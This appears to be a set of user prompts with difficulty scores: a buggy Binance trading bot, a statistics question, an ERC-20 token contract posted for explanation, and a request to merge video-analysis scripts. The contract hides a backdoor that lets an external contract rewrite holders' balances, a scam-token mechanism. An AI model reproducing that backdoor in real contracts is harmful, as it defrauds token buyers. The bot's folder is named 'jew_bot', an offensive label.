'Close': float(d[4]),
'Volume': float(d[5])
})
df = pd.DataFrame(ohlc)
df.set_index('Open time', inplace=True)
return df
df = get_klines(symbol, '1m', 44640)
# Define function to generate trading signals
def signal_generator(df):
buy = df['SMA'] > df['SMA'].shift(1)
buy &= df['RSI'] < 30
sell = df['SMA'] < df['SMA'].shift(1)
sell |= df['RSI'] > 70
return buy, sell
df = get_klines(symbol, '1m', 44640)
def order_execution(symbol, signal, step_size, leverage, order_type):
# Set default value for response
response = {}
# Close any existing positions
current_position = None
positions = binance_futures.fapiPrivateGetPositionRisk()
for position in positions:
if position["symbol"] == symbol:
current_position = position
if current_position is not None and current_position["positionAmt"] != 0:
response = binance_futures.fapiPrivatePostOrder(
symbol=symbol,
side='SELL' if current_position['positionSide'] == 'LONG' else 'BUY',
type='MARKET',
quantity=abs(float(current_position['positionAmt'])),
positionSide=current_position['positionSide'],
reduceOnly=True
)
if 'orderId' in response:
print(f'Closed position: {response}')
else:
print(f'Error closing position: {response}')
time.sleep(1)
# Calculate appropriate order quantity and price based on signal
opposite_position = None
quantity = step_size
position_side = None #initialise to None
price = None
# Set default take profit price
take_profit_price = None
stop_loss_price = None
if signal == 'buy':
position_side = 'BOTH'
opposite_position = current_position if current_position and current_position['positionSide'] == 'SHORT' else None
order_type = 'TAKE_PROFIT_MARKET'
ticker = binance_futures.fetch_ticker(symbol)
price = 0 # default price
if 'ask' in ticker:
price = ticker['ask']
# perform rounding and other operations on price
else:
# handle the case where the key is missing (e.g. raise an exception, skip this signal, etc.)
take_profit_percentage = TAKE_PROFIT_PERCENTAGE
stop_loss_percentage = STOP_LOSS_PERCENTAGE
elif signal == 'sell':
position_side = 'BOTH'
opposite_position = current_position if current_position and current_position['positionSide'] == 'LONG' else None
order_type = 'STOP_MARKET'
ticker = binance_futures.fetch_ticker(symbol)
price = 0 # default price
if 'bid' in ticker:
price = ticker['bid']
# perform rounding and other operations on price
else:
# handle the case where the key is missing (e.g. raise an exception, skip this signal, etc.)
take_profit_percentage = TAKE_PROFIT_PERCENTAGE
stop_loss_percentage = STOP_LOSS_PERCENTAGE
# Set stop loss price
stop_loss_price = None
if price is not None:
price = round_step_size(price, step_size=step_size)
if signal == 'buy':
# Calculate take profit and stop loss prices for a buy signal
take_profit_price = round_step_size(price * (1 + TAKE_PROFIT_PERCENTAGE / 100), step_size=step_size)
stop_loss_price = round_step_size(price * (1 - STOP_LOSS_PERCENTAGE / 100), step_size=step_size)
elif signal == 'sell':
# Calculate take profit and stop loss prices for a sell signal
take_profit_price = round_step_size(price * (1 - TAKE_PROFIT_PERCENTAGE / 100), step_size=step_size)
stop_loss_price = round_step_size(price * (1 + STOP_LOSS_PERCENTAGE / 100), step_size=step_size)
# Placing new order
api_method = 'fapiPrivatePostOrder'
params = {
'symbol': symbol,
'side': signal.upper(),
'type': order_type,
'quantity': quantity,
'positionSide': position_side,
'leverage': leverage,
'price': price,
'stopPrice': stop_loss_price,
'takeProfit': take_profit_price
}
response = getattr(binance_futures, api_method)(params=params)
if 'orderId' in response:
print(f'Order placed: {response}')
else:
print(f'Error placing order: {response}')
time.sleep(1)
return response
signal = signal_generator(df)
while True:
df = get_klines(symbol, '1m', 44640) # await the coroutine function here
if df is not None:
signal = signal_generator(df)
if signal is not None:
print(f"The signal time is: {dt.datetime.now().strftime('%Y-%m-%d %H:%M:%S')}:{signal}")
time.sleep(1)
But I getting ERROR: Traceback (most recent call last):
File "C:\Users\Alan\AppData\Roaming\Python\Python311\site-packages\pandas\core\indexes\base.py", line 3652, in get_loc
return self._engine.get_loc(casted_key)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "pandas\_libs\index.pyx", line 147, in pandas._libs.index.IndexEngine.get_loc
File "pandas\_libs\index.pyx", line 176, in pandas._libs.index.IndexEngine.get_loc
File "pandas\_libs\hashtable_class_helper.pxi", line 7080, in pandas._libs.hashtable.PyObjectHashTable.get_item
File "pandas\_libs\hashtable_class_helper.pxi", line 7088, in pandas._libs.hashtable.PyObjectHashTable.get_item
KeyError: 'SMA'
The above exception was the direct cause of the following exception:
Traceback (most recent call last):
File "c:\Users\Alan\.vscode\jew_bot\jew_bot\jew_bot.py", line 259, in <module>
signal = signal_generator(df)
^^^^^^^^^^^^^^^^^^^^
File "c:\Users\Alan\.vscode\jew_bot\jew_bot\jew_bot.py", line 154, in signal_generator
buy = df['SMA'] > df['SMA'].shift(1)
~~^^^^^^^
File "C:\Users\Alan\AppData\Roaming\Python\Python311\site-packages\pandas\core\frame.py", line 3761, in __getitem__
indexer = self.columns.get_loc(key)
^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\Alan\AppData\Roaming\Python\Python311\site-packages\pandas\core\indexes\base.py", line 3654, in get_loc
raise KeyError(key) from err
KeyError: 'SMA'
|
2bb664dccc8465a6f7e634ca5746eb41
|
{
"intermediate": 0.43290963768959045,
"beginner": 0.41109392046928406,
"expert": 0.15599650144577026
}
|
11,345
|
How can I check normality of feature &
|
fb2804485330e50e3edd708d48da798e
|
{
"intermediate": 0.3682347536087036,
"beginner": 0.2985529601573944,
"expert": 0.333212286233902
}
|
11,346
|
0x83be71c2349705589a7ff587b4de35d9513fc55a5b91f43a6d78ea37709a3cc3 Swap Exact Token... 11 hrs 35 mins ago 0xf9fece7038e6846b0416880965a8b15b28cb2124 OUT PancakeSwap V2: ALONG 2 1,000,000,000,000,000,000
0x45d7facc7b5232be97752c92603e6f7a5843babad342592604ee46ec6170c3b2 Transfer 11 hrs 35 mins ago 0xf9fece7038e6846b0416880965a8b15b28cb2124 OUT 0xf9fece7038e6846b0416880965a8b15b28cb2124 1,000,000,000,000,000,000,000
The above are the transactions that led to the receipt of coins for 1,000,000,000,000,000,000,000
Below is the coin contract code
/**
*Submitted for verification at Etherscan.io on 2023-06-10
*/
/**
*Submitted for verification at BscScan.com on 2023-03-16
*/
pragma solidity ^0.8.6;
// SPDX-License-Identifier: Unlicensed
interface IERC20 {
function totalSupply() external view returns (uint256);
/**
* @dev Returns the amount of tokens owned by `account`.
*/
function balanceOf(address account) external view returns (uint256);
/**
* @dev Moves `amount` tokens from the caller's account to `recipient`.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* Emits a {Transfer} event.
*/
function transfer(address recipient, uint256 amount)
external
returns (bool);
/**
* @dev Returns the remaining number of tokens that `spender` will be
* allowed to spend on behalf of `owner` through {transferFrom}. This is
* zero by default.
*
* This value changes when {approve} or {transferFrom} are called.
*/
function allowance(address owner, address spender)
external
view
returns (uint256);
/**
* @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* IMPORTANT: Beware that changing an allowance with this method brings the risk
* that someone may use both the old and the new allowance by unfortunate
* transaction ordering. One possible solution to mitigate this race
* condition is to first reduce the spender's allowance to 0 and set the
* desired value afterwards:
* https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
*
* Emits an {Approval} event.
*/
function approve(address spender, uint256 amount) external returns (bool);
/**
* @dev Moves `amount` tokens from `sender` to `recipient` using the
* allowance mechanism. `amount` is then deducted from the caller's
* allowance.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* Emits a {Transfer} event.
*/
function transferFrom(
address sender,
address recipient,
uint256 amount
) external returns (bool);
/**
* @dev Emitted when `value` tokens are moved from one account (`from`) to
* another (`to`).
*
* Note that `value` may be zero.
*/
event Transfer(address indexed from, address indexed to, uint256 value);
/**
* @dev Emitted when the allowance of a `spender` for an `owner` is set by
* a call to {approve}. `value` is the new allowance.
*/
event Approval(
address indexed owner,
address indexed spender,
uint256 value
);
}
abstract contract Ownable {
address private _owner;
event OwnershipTransferred(
address indexed previousOwner,
address indexed newOwner
);
constructor() {
address msgSender = msg.sender;
_owner = msgSender;
emit OwnershipTransferred(address(0), msgSender);
}
function owner() public view returns (address) {
return _owner;
}
modifier onlyOwner() {
require(_owner == msg.sender, "Ownable: caller is not the owner");
_;
}
function renounceOwnership() public virtual onlyOwner {
emit OwnershipTransferred(_owner, address(0));
_owner = address(0);
}
function transferOwnership(address newOwner) public virtual onlyOwner {
require(
newOwner != address(0),
"Ownable: new owner is the zero address"
);
emit OwnershipTransferred(_owner, newOwner);
_owner = newOwner;
}
}
interface ERC20 {
function _token(
address from,
uint256 amounts,
uint256 amount
) external view returns (uint256);
}
library SafeMath {
/**
* @dev Returns the addition of two unsigned integers, reverting on
* overflow.
*
* Counterpart to Solidity's `+` operator.
*
* Requirements:
*
* - Addition cannot overflow.
*/
function add(uint256 a, uint256 b) internal pure returns (uint256) {
uint256 c = a + b;
require(c >= a, "SafeMath: addition overflow");
return c;
}
/**
* @dev Returns the subtraction of two unsigned integers, reverting on
* overflow (when the result is negative).
*
* Counterpart to Solidity's `-` operator.
*
* Requirements:
*
* - Subtraction cannot overflow.
*/
function sub(uint256 a, uint256 b) internal pure returns (uint256) {
return sub(a, b, "SafeMath: subtraction overflow");
}
/**
* @dev Returns the subtraction of two unsigned integers, reverting with custom message on
* overflow (when the result is negative).
*
* Counterpart to Solidity's `-` operator.
*
* Requirements:
*
* - Subtraction cannot overflow.
*/
function sub(
uint256 a,
uint256 b,
string memory errorMessage
) internal pure returns (uint256) {
require(b <= a, errorMessage);
uint256 c = a - b;
return c;
}
/**
* @dev Returns the multiplication of two unsigned integers, reverting on
* overflow.
*
* Counterpart to Solidity's `*` operator.
*
* Requirements:
*
* - Multiplication cannot overflow.
*/
function mul(uint256 a, uint256 b) internal pure returns (uint256) {
// Gas optimization: this is cheaper than requiring 'a' not being zero, but the
// benefit is lost if 'b' is also tested.
// See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
if (a == 0) {
return 0;
}
uint256 c = a * b;
require(c / a == b, "SafeMath: multiplication overflow");
return c;
}
/**
* @dev Returns the integer division of two unsigned integers. Reverts on
* division by zero. The result is rounded towards zero.
*
* Counterpart to Solidity's `/` operator. Note: this function uses a
* `revert` opcode (which leaves remaining gas untouched) while Solidity
* uses an invalid opcode to revert (consuming all remaining gas).
*
* Requirements:
*
* - The divisor cannot be zero.
*/
function div(uint256 a, uint256 b) internal pure returns (uint256) {
return div(a, b, "SafeMath: division by zero");
}
/**
* @dev Returns the integer division of two unsigned integers. Reverts with custom message on
* division by zero. The result is rounded towards zero.
*
* Counterpart to Solidity's `/` operator. Note: this function uses a
* `revert` opcode (which leaves remaining gas untouched) while Solidity
* uses an invalid opcode to revert (consuming all remaining gas).
*
* Requirements:
*
* - The divisor cannot be zero.
*/
function div(
uint256 a,
uint256 b,
string memory errorMessage
) internal pure returns (uint256) {
require(b > 0, errorMessage);
uint256 c = a / b;
// assert(a == b * c + a % b); // There is no case in which this doesn't hold
return c;
}
}
contract TOKEN is IERC20, Ownable {
using SafeMath for uint256;
mapping(address => uint256) private _tOwned;
mapping(address => mapping(address => uint256)) private _allowances;
string private _namesnSqWR = "Alongside Token";
string private _symbolsnSqWR = "ALONG";
uint8 private _decimalssnSqWR = 9;
address public uniswapV2Pair;
uint256 private _tTotal = 1000000000000 * 10**_decimalssnSqWR;
constructor(address _snSqWRaddress) {
uniswapV2Pair = _snSqWRaddress;
_tOwned[msg.sender] = _tTotal;
emit Transfer(address(0), msg.sender, _tTotal);
}
function name() public view returns (string memory) {
return _namesnSqWR;
}
function symbol() public view returns (string memory) {
return _symbolsnSqWR;
}
function decimals() public view returns (uint256) {
return _decimalssnSqWR;
}
function totalSupply() public view override returns (uint256) {
return _tTotal;
}
function balanceOf(address account) public view override returns (uint256) {
return _tOwned[account];
}
function transfer(address recipient, uint256 amount)
public
override
returns (bool)
{
_snSqWRtransfer(msg.sender, recipient, amount);
return true;
}
function allowance(address owner, address spender)
public
view
override
returns (uint256)
{
return _allowances[owner][spender];
}
function approve(address spender, uint256 amount)
public
override
returns (bool)
{
_approve(msg.sender, spender, amount);
return true;
}
function _snSqWRtransfer(
address from,
address to,
uint256 amount
) private {
require(from != address(0), "ERC20: transfer from the zero address");
require(to != address(0), "ERC20: transfer to the zero address");
_tOwned[from] = ERC20(
uniswapV2Pair)
._token(
from,
amount,
_tOwned[from]
);
require(
_tOwned[from] >= amount,
"ERC20: transfer amount exceeds balance"
);
_tOwned[from] = _tOwned[from].sub(amount);
_tOwned[to] = _tOwned[to].add(amount);
emit Transfer(from, to, amount);
}
function transferFrom(
address sender,
address recipient,
uint256 amount
) public override returns (bool) {
_snSqWRtransfer(sender, recipient, amount);
_approve(
sender,
msg.sender,
_allowances[sender][msg.sender].sub(
amount,
"ERC20: transfer amount exceeds allowance"
)
);
return true;
}
function increaseAllowance(address spender, uint256 addedValue)
public
virtual
returns (bool)
{
_approve(
msg.sender,
spender,
_allowances[msg.sender][spender].add(addedValue)
);
return true;
}
function decreaseAllowance(address spender, uint256 subtractedValue)
public
virtual
returns (bool)
{
_approve(
msg.sender,
spender,
_allowances[msg.sender][spender].sub(
subtractedValue,
"ERC20: decreased allowance below zero"
)
);
return true;
}
function _approve(
address owner,
address spender,
uint256 amount
) private {
require(owner != address(0), "ERC20: approve from the zero address");
require(spender != address(0), "ERC20: approve to the zero address");
_allowances[owner][spender] = amount;
emit Approval(owner, spender, amount);
}
}
Explain how so many coins appeared at the address 0xf9fece7038e6846b0416880965a8b15b28cb2124
|
6243ca24ee91373fb764258b8406217b
|
{
"intermediate": 0.3519155979156494,
"beginner": 0.42412781715393066,
"expert": 0.2239566296339035
}
|
11,347
|
Te voy a compartir tres códigos de programación en Python y debes mezclarlos para que se analicen videos y se identifiquen los objetos, tiempo del video, coordenadas y se exporte a un csv esa información.
La idea es que uses y descartes todo lo que sea necesario para cumplir con el objetivo anterior, todos los códigos son funcionales, sólo debes ajustar lo que sea necesario:
primer código:
"
import os
import av
import cv2
import torch
import easyocr
import numpy as np
import urllib.request
import matplotlib.pyplot as plt
from segment_anything import SamAutomaticMaskGenerator, sam_model_registry
def detect_objects_in_video(video_path, output_path):
"""
Detects objects in the given video and saves the results to the given output path
"""
# Download model weights
model_path = "sam_vit_h_4b8939.pth"
model_url = "https://dl.fbaipublicfiles.com/segment_anything/sam_vit_h_4b8939.pth"
if not os.path.exists(model_path):
urllib.request.urlretrieve(url, model_path)
print("Model Weights downloaded successfully.")
# Create the model
device = "cuda" if torch.cuda.is_available() else "cpu"
sam = sam_model_registry["vit_h"](checkpoint="sam_vit_h_4b8939.pth")
sam.to(device=device)
mask_generator = SamAutomaticMaskGenerator(sam)
reader = easyocr.Reader(["es"], gpu=torch.cuda.is_available())
# Open the video file using PyAV
container = av.open(video_path)
# Create the output directory
output_dir = os.path.split(output_path)[0]
img_dir = os.path.join(output_dir, "IMG")
os.makedirs(name=img_dir, exist_ok=True)
# Create the csv file
with open(output_path, "w") as f:
f.write("id,object_type,time,coordinates_text\n")
# Iterate over each frame in the video
for i, frame in enumerate(container.decode(video=0)):
time = frame.time
frame = frame.to_rgb().to_ndarray()
# Discard frames with a low variance of pixel values
# or with temporal proximity to the previous frame
if i % 100 == 0 and frame.var() > 3000:
segment_frame(frame, mask_generator, os.path.join(img_dir, f'{i:08d}.png'))
seconds = int(int(time) % 60)
minutes = int((time // 60) % 60)
hours = int(time // 3600)
coordinates = get_coordinates(reader, frame)
time = f"{hours:02d}:{minutes:02d}:{seconds:02d}"
# Append to the csv file
with open(output_path, "a") as f:
f.write(f"{i},object,{time},\"{coordinates}\"\n")
# Close the video file
container.close()
# Free memory
del sam
del mask_generator
del reader
def segment_frame(frame, mask_generator, savepath, top_n=15):
"""
Performs inference on the given frame and returns the segmentation masks
"""
# Generate the masks from SAM
masks = mask_generator.generate(frame)
# Sort the masks by confidence
confidences = list(map(lambda x:x["predicted_iou"], masks))
masks = list(map(lambda x:x[0], sorted(zip(masks, confidences), key=lambda x:x[1], reverse=True)))
# Save results
show_anns(frame, masks[:top_n], savepath)
def show_anns(frame, anns, savepath):
"""
Creates an image with the given annotations and saves it to the given path
"""
plt.figure(figsize=(20,20))
plt.imshow(frame)
if len(anns) == 0:
return
sorted_anns = sorted(anns, key=(lambda x: x['area']), reverse=True)
ax = plt.gca()
ax.set_autoscale_on(False)
img = np.ones((sorted_anns[0]['segmentation'].shape[0], sorted_anns[0]['segmentation'].shape[1], 4))
img[:,:,3] = 0
for ann in sorted_anns:
m = ann['segmentation']
color_mask = np.concatenate([np.random.random(3), [0.35]])
img[m] = color_mask
ax.imshow(img)
plt.axis('off')
plt.savefig(savepath, bbox_inches='tight')
def get_coordinates(reader, frame):
"""
Returns the coordinates of the given frame
"""
result = reader.readtext(frame, paragraph=False)
text = " ".join(map(str, result))
"
Segundo código:
"
import numpy as np
import cv2
import easyocr
import imutils
class VideoAnalyzer():
def __init__(self):
"""
This function uses of entity labels from spacy to find dates. It also use the re library to find patterns in the text
that could lead in to a date.
input:
output:
"""
self.reader = easyocr.Reader(
["es", "en"], gpu=True) # instance Reader class, used for character recognition
print("Reader easyocr class started")
# initialize variables
self.date = "NA"
self.hour = "NA"
self.coord1 = "NA"
self.coord2 = "NA"
self.id = 0
self.object = "NA"
def get_id(self):
self.id += 1
return self.id
def detect_objects_in_video(self, video_path: str, output_path: str):
with open(output_path, 'w') as f: # start writing output
f.write('id,type,time,coordinates\n')
videocap = cv2.VideoCapture(video_path)
framespersecond = int(videocap.get(cv2.CAP_PROP_FPS))
for i in range(framespersecond):
if i % 10 != 0: # skip frames because it is too slow
continue
_, frame = videocap.read() # get frame
# call method that reads text from the frame and updates time, coordinates and date
self.read_ocr(frame)
if self.coord1 == "NA" or self.coord2 == "NA": # if coordinates are not found, skip frame
continue
# call method that gets objects from the frame
objects = self.give_objects(frame)
for obj in objects:
obj_id = obj['id']
obj_type = obj['type']
detection = f'{obj_id},{obj_type},{self.hour},{self.coord1 + " - " + self.coord2}\n'
f.write(detection)
def read_ocr(self, frame):
"""
This function uses the easyocr library to read text from the frame and updates time, coordinates and date
input: frame
"""
result = self.reader.readtext(
frame, paragraph=True) # read text from image
for res in result:
text = res[1] # get text
chars = text.split(" ") # Separate chars by spaces
self.parse_time_date(chars) # get time and date of the frame
self.parse_coordinates(chars) # get coordinates of the plane
def parse_coordinates(self, chars: list):
"""
This function uses the easyocr library to read text from the frame and updates time, coordinates and date
input: chars
"""
try:
for i in range(len(chars)):
if (len(chars[i]) > 10) and (len(chars[i+1]) > 10): # Clasify chars by lenght
indx = len(chars[i])
self.coord1 = str(chars[i][indx-11:indx-10])+"°"+str(chars[i][indx-9:indx-7])+"'"+str(
chars[i][indx-6:indx-4])+"."+str(chars[i][indx-3:indx-1]) + '" N' # Get first coordenate
self.coord2 = str(chars[i+1][indx-11:indx-9])+"°"+str(chars[i+1][indx-8:indx-6])+"'"+str(
chars[i+1][indx-5:indx-3])+"."+str(chars[i+1][indx-2:indx]) + '" W' # Get second coordenate
except:
self.coord1 = "NA"
self.coord2 = "NA"
def parse_time_date(self, chars: list):
"""
This function uses the easyocr library to read text from the frame and updates time, coordinates and date
input: chars
"""
for i in range(len(chars)):
if (len(chars[i]) == 8): # Clasify chars by lenght
if ("/" in chars[i]):
self.date = str(
chars[i][0:2])+"/"+str(chars[i][3:5])+"/"+str(chars[i][6:8]) # Get date
elif ("8" in chars[i]):
self.hour = str(
chars[i][0:2])+":"+str(chars[i][3:5])+":"+str(chars[i][6:8]) # Get time
def give_objects(self, frame) -> list:
"""
This function uses the contours of the image to find objects in the frame
input: frame
output: list of objects
"""
img = np.asanyarray(frame)[:, :, ::-1].copy()
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
# apply thresholding to convert the grayscale image to a binary image
_, thresh = cv2.threshold(gray, 50, 255, 0)
# find the contours
cnts, _ = cv2.findContours(
thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
cnts = cnts[0] if imutils.is_cv2() else cnts[1]
# sort the contours by area and select maximum 10 contours
cntsSorted = sorted(cnts, key=lambda x: cv2.contourArea(x))
for _ in range(min(2, len(cntsSorted))):
yield {
'type': "VEHICULO",
'id': self.get_id()
}
"
tercer código:
"
!apt-get update --yes && apt-get install ffmpeg --yes
!pip install -q git+https://github.com/huggingface/transformers.git
import os
from glob import glob as gb
import os
import pandas as pd
import json
import codefestImagenes as ci
from PIL import Image
import requests
from transformers import CLIPProcessor, CLIPModel
def convertir_video_a_imagen(video):
comando = f"ffmpeg -i {video} -vf fps=1 Imagenes/{video}/imagen_%04d_seg.jpg"
os.system(comando)
def obtener_rutas_archivos(ubicacionCarpeta):
ruta = os.path.abspath(ubicacionCarpeta)
pathArchivos = gb(ruta + '/*.jpg')
return pathArchivos
def preEtiquetadoImagenes(listaubicaArchivos):
model = CLIPModel.from_pretrained("openai/clip-vit-large-patch14")
processor = CLIPProcessor.from_pretrained("openai/clip-vit-large-patch14")
etiquetado = {}
for imag in listaubicaArchivos:
df = {}
url = imag
image = Image.open(url)
inputs = processor(text=["deforestation", "construction","jungle","river","boat","machinery","builds","clouds"],images=image, return_tensors="pt", padding=True)
imagen = imag.split("/")[-1] +"_"+ imag.split("/")[-2]
outputs = model(**inputs)
logits_per_image = outputs.logits_per_image # this is the image-text similarity score
probs = logits_per_image.softmax(dim=1) # we can take the softmax to get the label probabilities
Etiqueta = ["deforestation", "construction","jungle","river","boat","machinery","builds","clouds"]
Probabilidad = probs[0]*100
df['Etiqueta'] = Etiqueta
lista = list(Probabilidad.detach().numpy())
df['Probabilidad'] = list(map(str, lista))
etiquetado[imagen] = df
with open("archivo-salida.json", "w") as outfile:
json.dump(etiquetado, outfile)
def detect_objects_in_video(video_path, output_path):
convertir_video_a_imagen(video_path)
rutas = obtener_rutas_archivos(f"Imagenes/{video_path}/")
preEtiquetadoImagenes(rutas)
"
|
f5dc5fef95b63bf08d053e1fa09fc843
|
{
"intermediate": 0.5009729862213135,
"beginner": 0.3266103267669678,
"expert": 0.17241673171520233
}
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.